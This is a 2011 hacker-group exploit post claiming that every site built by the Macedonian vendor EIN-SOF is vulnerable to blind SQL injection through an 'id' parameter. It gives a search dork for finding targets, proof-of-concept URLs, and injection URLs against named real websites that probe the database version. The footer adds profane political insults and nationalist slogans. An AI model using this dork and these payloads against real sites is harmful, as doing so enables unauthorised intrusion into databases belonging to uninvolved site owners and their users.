=========================================================================
 EIN-SOF Solutions  BLIND SQL-i Vulnerability    
==========================================================================

+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
+=+=+=                                                                        +=+=+=
+=+=+=     /\  | |  | |            ________    _____    _____ __    _    __   +=+=+=
+=+=+=    /  \ | |__| |    _____  / ______/   |  _  \  | ____|\ \  / \  / /   +=+=+=
+=+=+=   / /\ \| |__| |  /_____/  | |         | |_) /  | |__   \ \/   \/ /    +=+=+=
+=+=+=  / ____ \ |  | |           | |_______  | __\ \  |  __|   \       /     +=+=+=
+=+=+= /_/    \_\|  | |           |________/  |_|  \_\ | |_______\_____/_____ +=+=+=
+=+=+=                                                 |_____________________|+=+=+=
+=+=+=                                                                        +=+=+=
+=+=+=              X-n3t - **RoAd_KiLlEr** - The|Denny` - The_1nv1s1bl3      +=+=+=
+=+=+=                                                                        +=+=+=
+=+=+=  0ne Nation , 0ne People , 0ne Culture , 0ne Language = Ethnic Albania +=+=+=
+=+=+=                                                                        +=+=+=
+=+=+=           ....::: | ALBANIAN HACKING CREW | :::....        2011        +=+=+=
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
      0                                                                      0
      1                ###########################################           1
      0               I'm **RoAd_KiLlEr**  member from 1337 DAY Team         1
      1                ###########################################           0
      0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 
[+]Title :.......  EIN-SOF Solutions  BLIND SQL-i Vulnerability        
[+]Author :......**RoAd_KiLlEr**
[+]Tested on :...Win Xp Sp 2/3 
---------------------------------------------------------------------------
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: sukihack[at]gmail[dot]com
[~] Home: http://1337day.com/author/2447
[~] Vendor: http://www.ein-sof.net.mk/web/Default.aspx
 
==========ExPl0iT3d by **RoAd_KiLlEr**==========
 
 
[+] DORK: "Developed by EIN-SOF"


[+] Description:

EIN-SOF is a leading provider of end-to-end IT services and solutions for both local and global companies.
 The company has a client-centric engagement model that combines local, senior, on-site resources with the cost, scale and quality advantages of off-shore operations.
 We adopt best practices methodologies to include V Cycle for software development and ISO 9001 for quality management. Our technical center has been assessed at CMMI level 3, indicating that all standard processes have been defined and documented. 
These certifications and practices provide a qualified foundation for all EIN-SOF service offerings and enable our clients to benefit internally
 

[ I ].  BSQL-i Vulnerability
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[+++] Note: Every web page developed EIN-SOF is vulnerable to BLIND Sql-Injection.

      Use the Dork to find websites,than find any "php" file with "id"  parameter  [ index.php?id=].
      
     Input passed to the  "id" parameter   in the "index.php" is not properly sanitised before being used in SQL queries. 

 
[P0C]:  http://127.0.0.1/content.php?id= [ BSql-INJECTION]

        http://127.0.0.1/news_details.php?id= [ BSql-INJECTION]


[L!v3 D3m0's]:

http://www.fashionmk.com/content.php?&id=1224+and+substring%28version%28%29,1,1%29=5  <= FALSE :(

http://www.fashionmk.com/content.php?&id=1224+and+substring%28version%28%29,1,1%29=4  <= TRUE :P


http://www.nibm.com.mk/news_details.php?id=18+and+substring%28version%28%29,1,1%29=5  <= FALSE :(
http://www.nibm.com.mk/news_details.php?id=18+and+substring%28version%28%29,1,1%29=4  <=TRUE :P
 
 

 
 
===========================================================================================
[!] Albanian Hacking Crew          
===========================================================================================
[!] **RoAd_KiLlEr**  says: FUCK BDI,Mbasi jeni qaq lesha me votu BDI,Ishalla jav venon kishat ke Shpija. PDSH 4 Life. 
===========================================================================================
[!] MaiL: sukihack[at]gmail[dot]com
===========================================================================================
[!] Greetz To : Ton![w]indowS | X-n3t | The|DennY` | THE_1NV1S1BL3 | KHG & All Albanian/Kosova Hackers
===========================================================================================
[!] Spec Th4nks:  r0073r  | indoushka ( We Missed u Bro ;) | Sid3^effects | L0rd CrusAd3r | jdc from jeffchannell.com | DoNnY | MaFiTeRRoR |
| Rehan Haxor | L0NnY | All  1337day Members | And All My Friendz
===========================================================================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
===========================================================================================



# 1337day.com @ http://1337day.com/ [2011-06-15]